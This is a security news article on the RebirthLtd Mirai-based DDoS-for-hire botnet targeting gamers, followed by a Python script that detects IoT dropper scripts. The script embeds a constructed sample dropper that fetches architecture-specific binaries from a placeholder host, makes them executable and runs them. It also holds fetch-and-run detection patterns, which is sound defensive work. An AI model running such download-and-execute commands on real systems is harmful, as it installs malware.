DDoS-as-a-Service Botnet Backed by Mirai Attacking Gaming Community

DDoS-as-a-Service botnets let attackers launch devastating distributed denial-of-service (DDoS) attacks as easily and cheaply as possible.

These botnets are built from compromised devices that can be rented or leased to cause service disruptions or outages by flooding targets with high volumes of traffic.

DDoS-as-a-Service makes it much easier for attackers to extort businesses, harm others, and remain anonymous.

Cybersecurity researchers at the Sysdig Threat Research Team (TRT) recently discovered a Mirai-based DDoS-as-a-Service botnet attacking the gaming community.

DDoS-as-a-Service Botnet

The Sysdig Threat Research Team discovered that the “rebirthltd.com” domain was involved in a financially motivated and growing DDoS-as-a-Service botnet based on Mirai malware in March 2024. 


This service, advertised via Telegram or an online shop, focuses mostly on the gaming community but also introduces risks for corporate entities. 

The threat actors operating this Mirai-derived botnet use compromised devices to carry out large-scale distributed denial-of-service attacks sold to paying buyers, offering a glimpse into the evolving market of cybercrime services that can stall business activities.

The RebirthLtd botnet is built on the Mirai malware, delivers DDoS-as-a-Service, and is marketed as a subscription offering accessible through an online store and a Telegram channel.

The service is mainly aimed at the gaming community, including video game streamers and the so-called “trolls” who disrupt the gameplay of others.

Operating under several hacking groups, some of whose members are claimed to be part of this ring, including CazzG, supposedly a Chinese administrator, it represents an emerging illicit ecosystem that sells bots and DDoS tools on the strength of anonymity and easy access.

The origins of the RebirthLtd DDoS botnet can be traced to earlier malware families and campaigns. Investigations link it to shop4youv2.de (a Mirai operation connected to the FBI’s Operation PowerOFF) and to Tsuki.army, which advertised a second network of bots.

Docx69 on TikTok under the moniker ‘prixnuke’ (Source – Sysdig)

Preliminary analysis from 2020 showed that “Rebirth” or “Vulcan” was an IoT-oriented botnet distinctively constructed on Gafgyt, QBot, and STDBot with known exploits. 

While the initial campaigns probably involved the botnet’s own developers, since August 2022 RebirthLtd appears to have drawn a wider range of customers to a commercialized DDoS-as-a-Service model that gives them access to its malicious capabilities.

This change is proof that threat actors continuously repackage and sell malware strains.

An investigation of the RebirthLtd DDoS botnet revealed that it evolved from previous malware variants like Rebirth/Vulcan. The latter featured code similarities and common infrastructure connections such as to domains yosh[.]ltd and blkyosh[.]com.

Though the first campaigns in 2019-2020 probably largely involved its developers, multiple countries have recently been hit with massive attacks.

These payloads consist of malicious bash scripts that try to download and execute architecture-specific ELF files, sometimes named after vulnerabilities or services.
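The multi-architecture download-and-execute pattern described above is a useful detection hook. The following Python script is an added example, not code from the article or from Sysdig: it applies simple heuristics to a shell script (a constructed sample that mimics the pattern, with a placeholder host name rather than any indicator from the article) and flags scripts that fetch and run several architecture-specific binaries in sequence, returning the URLs so they can be added to a blocklist.

```python
import re

# Constructed sample resembling the droppers the article describes: each line
# fetches one architecture-specific ELF, runs it and deletes it. The host
# "dropper.example" and the file names are placeholders, not real indicators.
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt
wget http://dropper.example/bins/mips -O mips; chmod +x mips; ./mips telnet; rm -rf mips
wget http://dropper.example/bins/arm7 -O arm7; chmod +x arm7; ./arm7 telnet; rm -rf arm7
wget http://dropper.example/bins/x86 -O x86; chmod +x x86; ./x86 telnet; rm -rf x86
"""

# Constructed benign script: one download, no per-architecture execution.
BENIGN_SCRIPT = """#!/bin/sh
cd /opt/app
wget https://releases.example/app-1.2.tar.gz
tar xzf app-1.2.tar.gz
"""

# Architecture tokens commonly used to name IoT botnet binaries.
ARCH_NAMES = {"mips", "mipsel", "arm", "arm5", "arm6", "arm7", "aarch64",
              "x86", "x86_64", "i586", "i686", "ppc", "sh4", "m68k", "sparc"}

FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
EXEC_RE = re.compile(r"(^|[;&|]\s*)\./\S+")          # "; ./mips ..." style execution
CLEANUP_RE = re.compile(r"\brm\s+(-rf?\s+)?\S+")      # self-deletion after running
CD_FALLBACK_RE = re.compile(r"cd\s+/\S+\s*\|\|\s*cd\s+/\S+")  # writable-dir probing
URL_RE = re.compile(r"https?://\S+")


def score_dropper(script: str) -> dict:
    """Return heuristic findings for a shell script and a verdict."""
    lines = [ln.strip() for ln in script.splitlines()
             if ln.strip() and not ln.lstrip().startswith("#")]
    archs = set()
    fetch_exec_lines = 0
    cleanup_lines = 0
    for line in lines:
        # A single line that both downloads and executes is the core signal.
        if FETCH_RE.search(line) and EXEC_RE.search(line):
            fetch_exec_lines += 1
        if CLEANUP_RE.search(line):
            cleanup_lines += 1
        for tok in re.findall(r"[A-Za-z0-9_]+", line):
            if tok.lower() in ARCH_NAMES:
                archs.add(tok.lower())

    # Several architectures fetched and executed in one script is the
    # hallmark of an IoT dropper; one download alone is not suspicious.
    verdict = ("likely_dropper"
               if fetch_exec_lines >= 2 and len(archs) >= 2 else "benign")
    return {
        "verdict": verdict,
        "architectures": sorted(archs),
        "fetch_exec_lines": fetch_exec_lines,
        "cleanup_lines": cleanup_lines,
        "cd_fallback": bool(CD_FALLBACK_RE.search(script)),
        "urls": sorted(set(URL_RE.findall(script))),
    }


if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_DROPPER), ("benign", BENIGN_SCRIPT)):
        print(name, score_dropper(text))
```

The heuristics are deliberately coarse: they catch the shape of the script (multiple architectures, fetch-and-run on one line, self-deletion, probing for a writable directory) rather than specific file names, so renaming a binary after a vulnerability or service, as the article notes these droppers do, does not defeat the check.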

The release of Mirai’s source code fueled a botnet industry and threats like Rebirth, reinforcing the need for diligent vulnerability management and runtime threat detection.


Tushar Subhra

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.
